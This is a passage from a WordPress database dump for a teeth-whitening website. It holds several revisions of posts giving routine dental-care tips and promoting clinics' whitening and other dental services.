start=\"3\">\r\n <li>\r\n<h2>Visit the dentist often</h2>\r\n</li>\r\n</ol>\r\nNothing ages your mouth quite like an old filling or misaligned teeth. That is why visiting your <a href=\"http://www.bracesdublin.ie/\">Frederick Dental Clinic dentist</a> is so important. Your overall oral health should be checked at least every six months, and if your teeth have shifted significantly over the last few years, it might be time to consider orthodontics to put the youth back into your smile. When your teeth shift, your jaw does too, and this can give your face a collapsed appearance.\r\n<ol start=\"4\">\r\n <li>\r\n<h2>Rinse your mouth with water</h2>\r\n</li>\r\n</ol>\r\nJust rinsing your mouth with water after eating is a little move that can make a massive difference when it comes to decreasing staining, residue and tooth decay.\r\n<ol start=\"5\">\r\n <li>\r\n<h2>Consider teeth whitening</h2>\r\n</li>\r\n</ol>\r\nYoung-looking smiles are defined by pearly white teeth. Unfortunately, our teeth become discoloured with time due to thinning of the enamel exposing the dentin underneath.\r\n\r\nThere are several ways for you to whiten your smile, from special toothpastes to whitening kits to in-chair treatments.\r\n\r\n ','Welcome to a whiter smile','','inherit','closed','closed','','20-revision-v1','','','2018-11-06 11:46:28','2018-11-06 11:46:28','',20,'https://teethwhiteningproduct.co.uk/20-revision-v1',0,'revision','',0),(173,1,'2018-11-06 11:50:48','2018-11-06 11:50:48','<img class=\"aligncenter wp-image-42 size-full\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/dentist-chair.jpg\" alt=\"\" width=\"960\" height=\"640\" />From home remedies to professional treatments: common teeth whitening procedures used to obtain a dazzling smile.\r\n<h2><a title=\"Permanent Link to 5 Ways to Make Your Smile Look Younger\" href=\"file:///C:/Users/VC/Desktop/work/Dead%20Sites/5-ways-make-smile-look-younger/\" rel=\"bookmark\">5 Ways to Make Your Smile Look Younger</a></h2>\r\nAs we age, our smiles can start to lose their sparkle. Over time, tooth enamel starts to wear away, exposing yellowness underneath and creating gummy smiles that are more prone to staining. Here are 5 simple ways to restore your smile and keep it looking young and fresh.\r\n<ol>\r\n <li>\r\n<h2>Eat healthy food</h2>\r\n</li>\r\n</ol>\r\nSugar, as well as anything else that sticks to the teeth (such as crackers and raisins), is well known for causing tooth decay. Tooth decay discolours and destroys the teeth, so it’s well worth putting down the sugary snacks and picking up the fruit and veg.\r\n\r\nResearch has shown that the higher the amount of folic acid you consume, the lower your risk of bleeding gums, which is one of the first and most telling signs of gum disease. Foods rich in folic acid include spinach, potatoes, broccoli, fresh orange juice and wholemeal bread.\r\n\r\nAnother food that’s good for your teeth is yoghurt. Consuming just ¼ cup of yoghurt every day can decrease your chances of suffering from serious gum disease. This is due to probiotics found in the yummy dairy product that compete with cavity-creating bacteria in the mouth.\r\n<ol start=\"2\">\r\n <li>\r\n<h2>Brush and floss</h2>\r\n</li>\r\n</ol>\r\nTo keep your teeth looking young and sparkly, you should brush your teeth twice every day, for two minutes each time. On top of this, you need to floss once daily.\r\n\r\nMake sure your toothbrush has soft bristles, and brush in a vertical, short, sweeping motion rather than scrubbing horizontally.\r\n\r\nWhen flossing, slide the floss down underneath the gumline as well as between the teeth. Bacteria and plaque are prone to getting stuck between the hidden recesses, and if left there this can leave to decay and inflammation.\r\n<ol start=\"3\">\r\n <li>\r\n<h2>Visit the dentist often</h2>\r\n</li>\r\n</ol>\r\nNothing ages your mouth quite like an old filling or misaligned teeth. That is why visiting your <a href=\"http://www.bracesdublin.ie/\">Frederick Dental Clinic dentist</a> is so important. Your overall oral health should be checked at least every six months, and if your teeth have shifted significantly over the last few years, it might be time to consider orthodontics to put the youth back into your smile. When your teeth shift, your jaw does too, and this can give your face a collapsed appearance.\r\n<ol start=\"4\">\r\n <li>\r\n<h2>Rinse your mouth with water</h2>\r\n</li>\r\n</ol>\r\nJust rinsing your mouth with water after eating is a little move that can make a massive difference when it comes to decreasing staining, residue and tooth decay.\r\n<ol start=\"5\">\r\n <li>\r\n<h2>Consider teeth whitening</h2>\r\n</li>\r\n</ol>\r\nYoung-looking smiles are defined by pearly white teeth. Unfortunately, our teeth become discoloured with time due to thinning of the enamel exposing the dentin underneath.\r\n\r\nThere are several ways for you to whiten your smile, from special toothpastes to whitening kits to in-chair treatments.\r\n\r\nMany prefer to have this done by professionals who are careful and trustworthy.\r\n\r\nExpert Teeth Whitening Services such as<a href=\"https://medlanddental.com.au/teeth-whitening/\" target=\"_blank\" rel=\"noopener\"> Teeth Whitening Product</a> provide exceptional dentistry\r\n\r\n ','Welcome to a whiter smile','','inherit','closed','closed','','20-revision-v1','','','2018-11-06 11:50:48','2018-11-06 11:50:48','',20,'https://teethwhiteningproduct.co.uk/20-revision-v1',0,'revision','',0),(174,1,'2018-11-06 12:14:18','2018-11-06 12:14:18','<img class=\"aligncenter wp-image-42 size-full\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/dentist-chair.jpg\" alt=\"\" width=\"960\" height=\"640\" />From home remedies to professional treatments: common teeth whitening procedures used to obtain a dazzling smile.\r\n<h2><a title=\"Permanent Link to 5 Ways to Make Your Smile Look Younger\" href=\"file:///C:/Users/VC/Desktop/work/Dead%20Sites/5-ways-make-smile-look-younger/\" rel=\"bookmark\">5 Ways to Make Your Smile Look Younger</a></h2>\r\nAs we age, our smiles can start to lose their sparkle. Over time, tooth enamel starts to wear away, exposing yellowness underneath and creating gummy smiles that are more prone to staining. Here are 5 simple ways to restore your smile and keep it looking young and fresh.\r\n<ol>\r\n <li>\r\n<h2>Eat healthy food</h2>\r\n</li>\r\n</ol>\r\nSugar, as well as anything else that sticks to the teeth (such as crackers and raisins), is well known for causing tooth decay. Tooth decay discolours and destroys the teeth, so it’s well worth putting down the sugary snacks and picking up the fruit and veg.\r\n\r\nResearch has shown that the higher the amount of folic acid you consume, the lower your risk of bleeding gums, which is one of the first and most telling signs of gum disease. Foods rich in folic acid include spinach, potatoes, broccoli, fresh orange juice and wholemeal bread.\r\n\r\nAnother food that’s good for your teeth is yoghurt. Consuming just ¼ cup of yoghurt every day can decrease your chances of suffering from serious gum disease. This is due to probiotics found in the yummy dairy product that compete with cavity-creating bacteria in the mouth.\r\n<ol start=\"2\">\r\n <li>\r\n<h2>Brush and floss</h2>\r\n</li>\r\n</ol>\r\nTo keep your teeth looking young and sparkly, you should brush your teeth twice every day, for two minutes each time. On top of this, you need to floss once daily.\r\n\r\nMake sure your toothbrush has soft bristles, and brush in a vertical, short, sweeping motion rather than scrubbing horizontally.\r\n\r\nWhen flossing, slide the floss down underneath the gumline as well as between the teeth. Bacteria and plaque are prone to getting stuck between the hidden recesses, and if left there this can leave to decay and inflammation.\r\n<ol start=\"3\">\r\n <li>\r\n<h2>Visit the dentist often</h2>\r\n</li>\r\n</ol>\r\nNothing ages your mouth quite like an old filling or misaligned teeth. That is why visiting your <a href=\"http://www.bracesdublin.ie/\">Frederick Dental Clinic dentist</a> is so important. Your overall oral health should be checked at least every six months, and if your teeth have shifted significantly over the last few years, it might be time to consider orthodontics to put the youth back into your smile. When your teeth shift, your jaw does too, and this can give your face a collapsed appearance.\r\n<ol start=\"4\">\r\n <li>\r\n<h2>Rinse your mouth with water</h2>\r\n</li>\r\n</ol>\r\nJust rinsing your mouth with water after eating is a little move that can make a massive difference when it comes to decreasing staining, residue and tooth decay.\r\n<ol start=\"5\">\r\n <li>\r\n<h2>Consider teeth whitening</h2>\r\n</li>\r\n</ol>\r\nYoung-looking smiles are defined by pearly white teeth. Unfortunately, our teeth become discoloured with time due to thinning of the enamel exposing the dentin underneath.\r\n\r\nThere are several ways for you to whiten your smile, from special toothpastes to whitening kits to in-chair treatments.\r\n\r\nMany prefer to have this done by professionals who are careful and trustworthy.\r\n\r\nExpert Teeth Whitening Services such as<a href=\"https://medlanddental.com.au/teeth-whitening/\" target=\"_blank\" rel=\"noopener\"> Teeth Whitening Product</a> which is a dental clinic who provide fantastic teeth whitening results and exceptional dentistry.\r\n\r\n \r\n\r\n ','Welcome to a whiter smile','','inherit','closed','closed','','20-revision-v1','','','2018-11-06 12:14:18','2018-11-06 12:14:18','',20,'https://teethwhiteningproduct.co.uk/20-revision-v1',0,'revision','',0),(175,1,'2018-11-06 12:26:14','2018-11-06 12:26:14','<img class=\"aligncenter wp-image-42 size-full\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/dentist-chair.jpg\" alt=\"\" width=\"960\" height=\"640\" />From home remedies to professional treatments: common teeth whitening procedures used to obtain a dazzling smile.\r\n<h2><a title=\"Permanent Link to 5 Ways to Make Your Smile Look Younger\" href=\"file:///C:/Users/VC/Desktop/work/Dead%20Sites/5-ways-make-smile-look-younger/\" rel=\"bookmark\">5 Ways to Make Your Smile Look Younger</a></h2>\r\nAs we age, our smiles can start to lose their sparkle. Over time, tooth enamel starts to wear away, exposing yellowness underneath and creating gummy smiles that are more prone to staining. Here are 5 simple ways to restore your smile and keep it looking young and fresh.\r\n<ol>\r\n <li>\r\n<h2>Eat healthy food</h2>\r\n</li>\r\n</ol>\r\nSugar, as well as anything else that sticks to the teeth (such as crackers and raisins), is well known for causing tooth decay. Tooth decay discolours and destroys the teeth, so it’s well worth putting down the sugary snacks and picking up the fruit and veg.\r\n\r\nResearch has shown that the higher the amount of folic acid you consume, the lower your risk of bleeding gums, which is one of the first and most telling signs of gum disease. Foods rich in folic acid include spinach, potatoes, broccoli, fresh orange juice and wholemeal bread.\r\n\r\nAnother food that’s good for your teeth is yoghurt. Consuming just ¼ cup of yoghurt every day can decrease your chances of suffering from serious gum disease. This is due to probiotics found in the yummy dairy product that compete with cavity-creating bacteria in the mouth.\r\n<ol start=\"2\">\r\n <li>\r\n<h2>Brush and floss</h2>\r\n</li>\r\n</ol>\r\nTo keep your teeth looking young and sparkly, you should brush your teeth twice every day, for two minutes each time. On top of this, you need to floss once daily.\r\n\r\nMake sure your toothbrush has soft bristles, and brush in a vertical, short, sweeping motion rather than scrubbing horizontally.\r\n\r\nWhen flossing, slide the floss down underneath the gumline as well as between the teeth. Bacteria and plaque are prone to getting stuck between the hidden recesses, and if left there this can leave to decay and inflammation.\r\n<ol start=\"3\">\r\n <li>\r\n<h2>Visit the dentist often</h2>\r\n</li>\r\n</ol>\r\nNothing ages your mouth quite like an old filling or misaligned teeth. That is why visiting your <a href=\"http://www.bracesdublin.ie/\">Frederick Dental Clinic dentist</a> is so important. Your overall oral health should be checked at least every six months, and if your teeth have shifted significantly over the last few years, it might be time to consider orthodontics to put the youth back into your smile. When your teeth shift, your jaw does too, and this can give your face a collapsed appearance.\r\n<ol start=\"4\">\r\n <li>\r\n<h2>Rinse your mouth with water</h2>\r\n</li>\r\n</ol>\r\nJust rinsing your mouth with water after eating is a little move that can make a massive difference when it comes to decreasing staining, residue and tooth decay.\r\n<ol start=\"5\">\r\n <li>\r\n<h2>Consider teeth whitening</h2>\r\n</li>\r\n</ol>\r\nYoung-looking smiles are defined by pearly white teeth. Unfortunately, our teeth become discoloured with time due to thinning of the enamel exposing the dentin underneath.\r\n\r\nThere are several ways for you to whiten your smile, from special toothpastes to whitening kits to in-chair treatments.\r\n\r\nMany prefer to have this done by professionals who are careful and trustworthy.\r\n\r\n<a href=\"https://medlanddental.com.au/teeth-whitening/\" target=\"_blank\" rel=\"noopener\">Expert Teeth Whitening Services</a> such as The Zoom WhiteSpeed system is one of the quickest and most convenient way to immediately achieve fantastic teeth whitening result.\r\n\r\n \r\n\r\n ','Welcome to a whiter smile','','inherit','closed','closed','','20-revision-v1','','','2018-11-06 12:26:14','2018-11-06 12:26:14','',20,'https://teethwhiteningproduct.co.uk/20-revision-v1',0,'revision','',0),(176,1,'2018-11-06 12:33:10','2018-11-06 12:33:10','<img class=\"aligncenter wp-image-42 size-full\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/dentist-chair.jpg\" alt=\"\" width=\"960\" height=\"640\" />From home remedies to professional treatments: common teeth whitening procedures used to obtain a dazzling smile.\r\n<h2><a title=\"Permanent Link to 5 Ways to Make Your Smile Look Younger\" href=\"file:///C:/Users/VC/Desktop/work/Dead%20Sites/5-ways-make-smile-look-younger/\" rel=\"bookmark\">5 Ways to Make Your Smile Look Younger</a></h2>\r\nAs we age, our smiles can start to lose their sparkle. Over time, tooth enamel starts to wear away, exposing yellowness underneath and creating gummy smiles that are more prone to staining. Here are 5 simple ways to restore your smile and keep it looking young and fresh.\r\n<ol>\r\n <li>\r\n<h2>Eat healthy food</h2>\r\n</li>\r\n</ol>\r\nSugar, as well as anything else that sticks to the teeth (such as crackers and raisins), is well known for causing tooth decay. Tooth decay discolours and destroys the teeth, so it’s well worth putting down the sugary snacks and picking up the fruit and veg.\r\n\r\nResearch has shown that the higher the amount of folic acid you consume, the lower your risk of bleeding gums, which is one of the first and most telling signs of gum disease. Foods rich in folic acid include spinach, potatoes, broccoli, fresh orange juice and wholemeal bread.\r\n\r\nAnother food that’s good for your teeth is yoghurt. Consuming just ¼ cup of yoghurt every day can decrease your chances of suffering from serious gum disease. This is due to probiotics found in the yummy dairy product that compete with cavity-creating bacteria in the mouth.\r\n<ol start=\"2\">\r\n <li>\r\n<h2>Brush and floss</h2>\r\n</li>\r\n</ol>\r\nTo keep your teeth looking young and sparkly, you should brush your teeth twice every day, for two minutes each time. On top of this, you need to floss once daily.\r\n\r\nMake sure your toothbrush has soft bristles, and brush in a vertical, short, sweeping motion rather than scrubbing horizontally.\r\n\r\nWhen flossing, slide the floss down underneath the gumline as well as between the teeth. Bacteria and plaque are prone to getting stuck between the hidden recesses, and if left there this can leave to decay and inflammation.\r\n<ol start=\"3\">\r\n <li>\r\n<h2>Visit the dentist often</h2>\r\n</li>\r\n</ol>\r\nNothing ages your mouth quite like an old filling or misaligned teeth. That is why visiting your <a href=\"http://www.bracesdublin.ie/\">Frederick Dental Clinic dentist</a> is so important. Your overall oral health should be checked at least every six months, and if your teeth have shifted significantly over the last few years, it might be time to consider orthodontics to put the youth back into your smile. When your teeth shift, your jaw does too, and this can give your face a collapsed appearance.\r\n<ol start=\"4\">\r\n <li>\r\n<h2>Rinse your mouth with water</h2>\r\n</li>\r\n</ol>\r\nJust rinsing your mouth with water after eating is a little move that can make a massive difference when it comes to decreasing staining, residue and tooth decay.\r\n<ol start=\"5\">\r\n <li>\r\n<h2>Consider teeth whitening</h2>\r\n</li>\r\n</ol>\r\nYoung-looking smiles are defined by pearly white teeth. Unfortunately, our teeth become discoloured with time due to thinning of the enamel exposing the dentin underneath.\r\n\r\nThere are several ways for you to whiten your smile, from special toothpastes to whitening kits to in-chair treatments.\r\n\r\n \r\n\r\n \r\n\r\n ','Welcome to a whiter smile','','inherit','closed','closed','','20-revision-v1','','','2018-11-06 12:33:10','2018-11-06 12:33:10','',20,'https://teethwhiteningproduct.co.uk/20-revision-v1',0,'revision','',0),(177,1,'2018-11-06 12:34:29','2018-11-06 12:34:29','A healthy mouth is important to us, as we all need it to speak, drink, eat, smile and kiss! We all aim to achieve that healthy, appealing smile but many of us are not quite sure how to achieve it. If you look after you teeth and gums, you will be looking after a very important part of your body that helps you look great and feel confident. Here are a few guidelines that we hope you will find useful in creating that healthy, confident smile:\n\nWe all need to visit our dentist and hygienist regularly to maintain that healthy smile. By visiting MC Dental Practice regularly, your dentist will be able to spot any problems that you may have and any that you may be unaware of that can be detected on radiographs. Your hygienist will be able to help you maintain healthy gums and advise you on ways to improve your cleaning at home.\n\n \n\n<a href=\"https://medlanddental.com.au/teeth-whitening/\" target=\"_blank\" rel=\"noopener\">Expert Teeth Whitening Services</a> such as The Zoom WhiteSpeed system is one of the quickest and most convenient way to immediately achieve fantastic teeth whitening result.\n\nOur highly trained staff are happy to discuss any anxieties you may have or offer advice on treatments available.\n\nWe offer a preventative dental care program which is payable monthly, thus taking the worry out of facing large\ndental bills.\n\nA wide range of treatments are available which include.\n\n► Cosmetic dentistry\n► Teeth Whitening\n► Orthodontic\n► Dental Implants\n► Crown and Bridges\n► Prosthetic\n► Periodontics\n► Endodontics','Keeping a Healthy Smile','','inherit','closed','closed','','98-autosave-v1','','','2018-11-06 12:34:29','2018-11-06 12:34:29','',98,'https://teethwhiteningproduct.co.uk/98-autosave-v1',0,'revision','',0),(178,1,'2018-11-06 12:36:26','2018-11-06 12:36:26','A healthy mouth is important to us, as we all need it to speak, drink, eat, smile and kiss! We all aim to achieve that healthy, appealing smile but many of us are not quite sure how to achieve it. If you look after you teeth and gums, you will be looking after a very important part of your body that helps you look great and feel confident. Here are a few guidelines that we hope you will find useful in creating that healthy, confident smile:\r\n\r\nWe all need to visit our dentist and hygienist regularly to maintain that healthy smile. By visiting MC Dental Practice regularly, your dentist will be able to spot any problems that you may have and any that you may be unaware of that can be detected on radiographs. Your hygienist will be able to help you maintain healthy gums and advise you on ways to improve your cleaning at home.\r\n\r\nIt could be very helpful to research many possible ways in which you could whiten your quickly and effectively\r\n\r\n<a href=\"https://medlanddental.com.au/teeth-whitening/\" target=\"_blank\" rel=\"noopener\">Expert Teeth Whitening Services</a> such as The Zoom WhiteSpeed system is one of the quickest and most convenient way to immediately achieve fantastic teeth whitening result.\r\n\r\nOur highly trained staff are happy to discuss any anxieties you may have or offer advice on treatments available.\r\n\r\nWe offer a preventative dental care program which is payable monthly, thus taking the worry out of facing large\r\ndental bills.\r\n\r\nA wide range of treatments are available which include.\r\n\r\n► Cosmetic dentistry\r\n► Teeth Whitening\r\n► Orthodontic\r\n► Dental Implants\r\n► Crown and Bridges\r\n► Prosthetic\r\n► Periodontics\r\n► Endodontics','Keeping a Healthy Smile','','inherit','closed','closed','','98-revision-v1','','','2018-11-06 12:36:26','2018-11-06 12:36:26','',98,'https://teethwhiteningproduct.co.uk/98-revision-v1',0,'revision','',0),(179,1,'2018-11-06 12:36:44','2018-11-06 12:36:44','<h2>Healthy Smile</h2>\r\nA healthy mouth is important to us, as we all need it to speak, drink, eat, smile and kiss! We all aim to achieve that healthy, appealing smile but many of us are not quite sure how to achieve it. If you look after you teeth and gums, you will be looking after a very important part of your body that helps you look great and feel confident. Here are a few guidelines that we hope you will find useful in creating that healthy, confident smile:\r\n\r\nWe all need to visit our dentist and hygienist regularly to maintain that healthy smile. By visiting MC Dental Practice regularly, your dentist will be able to spot any problems that you may have and any that you may be unaware of that can be detected on radiographs. Your hygienist will be able to help you maintain healthy gums and advise you on ways to improve your cleaning at home.\r\n\r\nIt could be very helpful to research many possible ways in which you could whiten your quickly and effectively\r\n\r\n<a href=\"https://medlanddental.com.au/teeth-whitening/\" target=\"_blank\" rel=\"noopener\">Expert Teeth Whitening Services</a> such as The Zoom WhiteSpeed system is one of the quickest and most convenient way to immediately achieve fantastic teeth whitening result.\r\n\r\nOur highly trained staff are happy to discuss any anxieties you may have or offer advice on treatments available.\r\n\r\nWe offer a preventative dental care program which is payable monthly, thus taking the worry out of facing large\r\ndental bills.\r\n\r\nA wide range of treatments are available which include.\r\n\r\n► Cosmetic dentistry\r\n► Teeth Whitening\r\n► Orthodontic\r\n► Dental Implants\r\n► Crown and Bridges\r\n► Prosthetic\r\n► Periodontics\r\n► Endodontics','Keeping a Healthy Smile','','inherit','closed','closed','','98-revision-v1','','','2018-11-06 12:36:44','2018-11-06 12:36:44','',98,'https://teethwhiteningproduct.co.uk/98-revision-v1',0,'revision','',0),(180,1,'2018-11-06 12:37:03','2018-11-06 12:37:03','<h2>Healthy Smile</h2>\r\nA healthy mouth is important to us, as we all need it to speak, drink, eat, smile and kiss! We all aim to achieve that healthy, appealing smile but many of us are not quite sure how to achieve it. If you look after you teeth and gums, you will be looking after a very important part of your body that helps you look great and feel confident. Here are a few guidelines that we hope you will find useful in creating that healthy, confident smile:\r\n\r\nWe all need to visit our dentist and hygienist regularly to maintain that healthy smile. By visiting MC Dental Practice regularly, your dentist will be able to spot any problems that you may have and any that you may be unaware of that can be detected on radiographs. Your hygienist will be able to help you maintain healthy gums and advise you on ways to improve your cleaning at home.\r\n\r\nIt could be very helpful to research many possible ways in which you could whiten your quickly and effectively\r\n\r\n<a href=\"https://medlanddental.com.au/teeth-whitening/\" target=\"_blank\" rel=\"noopener\">Expert Teeth Whitening Services</a> such as The Zoom WhiteSpeed system is one of the quickest and most convenient way to immediately achieve fantastic teeth whitening result.\r\n\r\nOur highly trained staff are happy to discuss any anxieties you may have or offer advice on treatments available.\r\n\r\nWe offer a preventative dental care program which is payable monthly, thus taking the worry out of facing large\r\ndental bills.\r\n\r\n<strong>A wide range of treatments are available which include.</strong>\r\n\r\n<strong>► Cosmetic dentistry</strong>\r\n<strong> ► Teeth Whitening</strong>\r\n<strong> ► Orthodontic</strong>\r\n<strong> ► Dental Implants</strong>\r\n<strong> ► Crown and Bridges</strong>\r\n<strong> ► Prosthetic</strong>\r\n<strong> ► Periodontics</strong>\r\n<strong> ► Endodontics</strong>','Keeping a Healthy Smile','','inherit','closed','closed','','98-revision-v1','','','2018-11-06 12:37:03','2018-11-06 12:37:03','',98,'https://teethwhiteningproduct.co.uk/98-revision-v1',0,'revision','',0),(181,1,'2018-11-06 12:38:27','2018-11-06 12:38:27','','teeth-1652937_960_720','','inherit','closed','closed','','teeth-1652937_960_720','','','2018-11-06 12:38:27','2018-11-06 12:38:27','',98,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/11/teeth-1652937_960_720.jpg',0,'attachment','image/jpeg',0),(182,1,'2018-11-06 12:38:38','2018-11-06 12:38:38','<h2>Healthy Smile</h2>\r\nA healthy mouth is important to us, as we all need it to speak, drink, eat, smile and kiss! We all aim to achieve that healthy, appealing smile but many of us are not quite sure how to achieve it. If you look after you teeth and gums, you will be looking after a very important part of your body that helps you look great and feel confident. Here are a few guidelines that we hope you will find useful in creating that healthy, confident smile:\r\n\r\nWe all need to visit our dentist and hygienist regularly to maintain that healthy smile. By visiting MC Dental Practice regularly, your dentist will be able to spot any problems that you may have and any that you may be unaware of that can be detected on radiographs. Your hygienist will be able to help you maintain healthy gums and advise you on ways to improve your cleaning at home.\r\n\r\nIt could be very helpful to research many possible ways in which you could whiten your quickly and effectively\r\n\r\n<a href=\"https://medlanddental.com.au/teeth-whitening/\" target=\"_blank\" rel=\"noopener\">Expert Teeth Whitening Services</a> such as The Zoom WhiteSpeed system is one of the quickest and most convenient way to immediately achieve fantastic teeth whitening result.\r\n\r\n<img class=\"size-full wp-image-181 alignleft\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/11/teeth-1652937_960_720.jpg\" alt=\"\" width=\"960\" height=\"696\" />\r\n\r\nOur highly trained staff are happy to discuss any anxieties you may have or offer advice on treatments available.\r\n\r\nWe offer a preventative dental care program which is payable monthly, thus taking the worry out of facing large\r\ndental bills.\r\n\r\n<strong>A wide range of treatments are available which include.</strong>\r\n\r\n<strong>► Cosmetic dentistry</strong>\r\n<strong> ► Teeth Whitening</strong>\r\n<strong> ► Orthodontic</strong>\r\n<strong> ► Dental Implants</strong>\r\n<strong> ► Crown and Bridges</strong>\r\n<strong> ► Prosthetic</strong>\r\n<strong> ► Periodontics</strong>\r\n<strong> ► Endodontics</strong>','Keeping a Healthy Smile','','inherit','closed','closed','','98-revision-v1','','','2018-11-06 12:38:38','2018-11-06 12:38:38','',98,'https://teethwhiteningproduct.co.uk/98-revision-v1',0,'revision','',0),(183,1,'2018-11-06 12:39:03','2018-11-06 12:39:03','<h2>Healthy Smile</h2>\r\nA healthy mouth is important to us, as we all need it to speak, drink, eat, smile and kiss! We all aim to achieve that healthy, appealing smile but many of us are not quite sure how to achieve it. If you look after you teeth and gums, you will be looking after a very important part of your body that helps you look great and feel confident. Here are a few guidelines that we hope you will find useful in creating that healthy, confident smile:\r\n\r\nWe all need to visit our dentist and hygienist regularly to maintain that healthy smile. By visiting MC Dental Practice regularly, your dentist will be able to spot any problems that you may have and any that you may be unaware of that can be detected on radiographs. Your hygienist will be able to help you maintain healthy gums and advise you on ways to improve your cleaning at home.\r\n\r\nIt could be very helpful to research many possible ways in which you could whiten your quickly and effectively\r\n\r\n<a href=\"https://medlanddental.com.au/teeth-whitening/\" target=\"_blank\" rel=\"noopener\">Expert Teeth Whitening Services</a> such as The Zoom WhiteSpeed system is one of the quickest and most convenient way to immediately achieve fantastic teeth whitening result.\r\n\r\n<img class=\"alignleft wp-image-181 size-medium\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/11/teeth-1652937_960_720-300x218.jpg\" alt=\"\" width=\"300\" height=\"218\" />\r\n\r\nOur highly trained staff are happy to discuss any anxieties you may have or offer advice on treatments available.\r\n\r\nWe offer a preventative dental care program which is payable monthly, thus taking the worry out of facing large\r\ndental bills.\r\n\r\n<strong>A wide range of treatments are available which include.</strong>\r\n\r\n<strong>► Cosmetic dentistry</strong>\r\n<strong> ► Teeth Whitening</strong>\r\n<strong> ► Orthodontic</strong>\r\n<strong> ► Dental Implants</strong>\r\n<strong> ► Crown and Bridges</strong>\r\n<strong> ► Prosthetic</strong>\r\n<strong> ► Periodontics</strong>\r\n<strong> ► Endodontics</strong>','Keeping a Healthy Smile','','inherit','closed','closed','','98-revision-v1','','','2018-11-06 12:39:03','2018-11-06 12:39:03','',98,'https://teethwhiteningproduct.co.uk/98-revision-v1',0,'revision','',0),(184,1,'2018-11-06 12:39:44','2018-11-06 12:39:44','<h2>Healthy Smile</h2>\r\nA healthy mouth is important to us, as we all need it to speak, drink, eat, smile and kiss! We all aim to achieve that healthy, appealing smile but many of us are not quite sure how to achieve it. If you look after you teeth and gums, you will be looking after a very important part of your body that helps you look great and feel confident. Here are a few guidelines that we hope you will find useful in creating that healthy, confident smile:\r\n\r\nWe all need to visit our dentist and hygienist regularly to maintain that healthy smile. By visiting MC Dental Practice regularly, your dentist will be able to spot any problems that you may have and any that you may be unaware of that can be detected on radiographs. Your hygienist will be able to help you maintain healthy gums and advise you on ways to improve your cleaning at home.\r\n\r\nIt could be very helpful to research many possible ways in which you could whiten your quickly and effectively\r\n\r\n<a href=\"https://medlanddental.com.au/teeth-whitening/\" target=\"_blank\" rel=\"noopener\">Expert Teeth Whitening Services</a> such as The Zoom WhiteSpeed system is one of the quickest and most convenient way to immediately achieve fantastic teeth whitening result.\r\n\r\n<img class=\"alignleft wp-image-181 \" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/11/teeth-1652937_960_720.jpg\" alt=\"\" width=\"794\" height=\"576\" />\r\n\r\nOur highly trained staff are happy to discuss any anxieties you may have or offer advice on treatments available.\r\n\r\nWe offer a preventative dental care program which is payable monthly, thus taking the worry out of facing large\r\ndental bills.\r\n\r\n<strong>A wide range of treatments are available which include.</strong>\r\n\r\n<strong>► Cosmetic dentistry</strong>\r\n<strong> ► Teeth Whitening</strong>\r\n<strong> ► Orthodontic</strong>\r\n<strong> ► Dental Implants</strong>\r\n<strong> ► Crown and Bridges</strong>\r\n<strong> ► Prosthetic</strong>\r\n<strong> ► Periodontics</strong>\r\n<strong> ► Endodontics</strong>','Keeping a Healthy Smile','','inherit','closed','closed','','98-revision-v1','','','2018-11-06 12:39:44','2018-11-06 12:39:44','',98,'https://teethwhiteningproduct.co.uk/98-revision-v1',0,'revision','',0),(185,1,'2018-11-06 12:39:58','2018-11-06 12:39:58','<h2>Healthy Smile</h2>\r\nA healthy mouth is important to us, as we all need it to speak, drink, eat, smile and kiss! We all aim to achieve that healthy, appealing smile but many of us are not quite sure how to achieve it. If you look after you teeth and gums, you will be looking after a very important part of your body that helps you look great and feel confident. Here are a few guidelines that we hope you will find useful in creating that healthy, confident smile:\r\n\r\nWe all need to visit our dentist and hygienist regularly to maintain that healthy smile. By visiting MC Dental Practice regularly, your dentist will be able to spot any problems that you may have and any that you may be unaware of that can be detected on radiographs. Your hygienist will be able to help you maintain healthy gums and advise you on ways to improve your cleaning at home.\r\n\r\nIt could be very helpful to research many possible ways in which you could whiten your quickly and effectively\r\n\r\n<a href=\"https://medlanddental.com.au/teeth-whitening/\" target=\"_blank\" rel=\"noopener\">Expert Teeth Whitening Services</a> such as The Zoom WhiteSpeed system is one of the quickest and most convenient way to immediately achieve fantastic teeth whitening result.\r\n\r\n<img class=\"alignleft wp-image-181 \" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/11/teeth-1652937_960_720.jpg\" alt=\"\" width=\"649\" height=\"471\" />\r\n\r\nOur highly trained staff are happy to discuss any anxieties you may have or offer advice on treatments available.\r\n\r\nWe offer a preventative dental care program which is payable monthly, thus taking the worry out of facing large\r\ndental bills.\r\n\r\n<strong>A wide range of treatments are available which include.</strong>\r\n\r\n<strong>► Cosmetic dentistry</strong>\r\n<strong> ► Teeth Whitening</strong>\r\n<strong> ► Orthodontic</strong>\r\n<strong> ► Dental Implants</strong>\r\n<strong> ► Crown and Bridges</strong>\r\n<strong> ► Prosthetic</strong>\r\n<strong> ► Periodontics</strong>\r\n<strong> ► Endodontics</strong>','Keeping a Healthy Smile','','inherit','closed','closed','','98-revision-v1','','','2018-11-06 12:39:58','2018-11-06 12:39:58','',98,'https://teethwhiteningproduct.co.uk/98-revision-v1',0,'revision','',0),(186,1,'2018-11-06 12:42:37','2018-11-06 12:42:37','<p align=\"justify\"><span style=\"font-family: Verdana; font-size: x-large;\">Preventive Dentistry</span></p>\r\n<p align=\"justify\"><span style=\"font-family: Verdana;\">We firmly believe that prevention is better than cure. We want our patients to keep their teeth for life. We can pre-book routine examinations to help us ensure patients are seen at the right time so we can carefully monitor their dental and oral health and provide the best advice to prevent problems occurring in the first place.</span></p>\r\n<p align=\"justify\"><span style=\"font-family: Verdana; font-size: x-large;\">Periodontal (Gum) Disease</span></p>\r\n<p align=\"justify\"><span style=\"font-family: Verdana; font-size: medium;\">19 out of 20 people suffer from gum disease at some point in their lives, making it the most common disease in the world.</span></p>\r\n<p align=\"justify\"><span style=\"font-family: Verdana;\">It attacks the gum tissues and the bone underneath, which hold the teeth in place. If your gums bleed it means you have gum disease. This can lead to bad breath, pain and 